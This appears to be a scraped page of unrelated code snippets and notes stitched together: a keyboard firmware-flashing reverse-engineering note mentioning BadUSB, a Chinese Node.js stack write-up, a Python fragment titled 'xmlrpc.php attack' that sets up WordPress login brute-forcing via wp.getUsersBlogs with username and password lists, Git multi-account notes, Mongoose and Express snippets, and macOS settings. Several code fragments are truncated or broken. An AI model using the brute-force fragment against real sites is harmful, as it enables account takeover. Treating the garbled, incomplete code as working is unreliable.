Script for KBT Pure Pro firmware flashing


Some time ago, I reversed the protocol used by KBT Pure Pro for flashing its firmware in a hope of being able to flash a custom firmware (or do some BadUSB demonstration). This script is able to upload a firmware binary onto the keyboard.

The binary is obfuscated (already solved on SE) However, the firmware has a 32-bit checksum (at the end of the image), which does not seem to be any of the commonly used ones (there is this) (EDIT: Actually turned out to be a standard one, see edit below). If the uploaded firmware checksum does not match, the keyboard stays in the bootloader.

技术选型上服务端是Node.js,应用框架选了老牌的Express(4.x变化挺大不少中间件都废了),数据服务用的是MongoLab(MongoDB的云服务平台),图片上传用的是又拍云,程序部署在Nodejitsu上。模板引擎没选主流的Jade或ejs,而是用Express React Views它实现了在服务端渲染React组件。前端框架是用React,这次有意想追求前后端全部组件化的组织。之前是用Webpack实现CommonJS模块打包,这次用Browserify配置更简单,它有丰富的transform很赞,其中的reactify转换React的JSX很完美。CSS用Sass+autoprefixer让人省心。将这一切串起来的自动构建工具是Gulp。我其实崇尚用最精简的工具组合开发,上述组合在我看来比较精简了。(帖纸留念)


xmlrpc.php attack
import futures
import requests
from Queue import Queue
XML_URL = ""
USER_FILE = "username.txt"
PASS_FILE = "password.txt"
data = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>"""
A simple version of co
* A simple co
* @param {Function} fn Generator Function
* @return {Function} callback
function co(fn) {
return function(done) {
done = done || function() {};
var gen = fn();
Git的多账号如何处理? 1.同一台电脑多个git(不同网站的)账号 2.同一台电脑多个git(同一个网站的比如github的)多个账号


首先不同网站,当然可以使用同一个邮箱,比如我的github,gitlab,bitbucket的账号都是monkeysuzie[at] 这时候不用担心密钥的问题,因为这些网站push pull 认证的唯一性的是邮箱 比如我的windows 上 2个账号一个gitlab 一个github (用的都是id_rsa)

host github
  Port 22


Post.findById(postId, function (err, post) {
// handle errors ..
post.comments.push({ body: someText, user: userId });;
var commentSchema = new Schema({
body: String
, user: Schema.ObjectId
, created: { type: Date, default: }
var postSchema = new Schema({ comments: [commentSchema] });
var Post = mongoose.model('Post', postSchema);
Clean Install – OS X 10.11 El Capitan

OS X Preferences

most of these require logout/restart to take effect

# Enable character repeat on keydown
defaults write -g ApplePressAndHoldEnabled -bool false

# Set a shorter Delay until key repeat
Express settings for node.js
var express = require('express');
var app = express.createServer();
base: function(){
// return the app's mount-point
// so that urls can adjust. For example
// if you run this example /post/add works
An example NodeJS / Mongoose / Express application based on their respective tutorials
/* The API controller
Exports 3 methods:
* post - Creates a new thread
* list - Returns a list of threads
* show - Displays a thread and its posts
var Thread = require('../models/thread.js');
var Post = require('../models/post.js');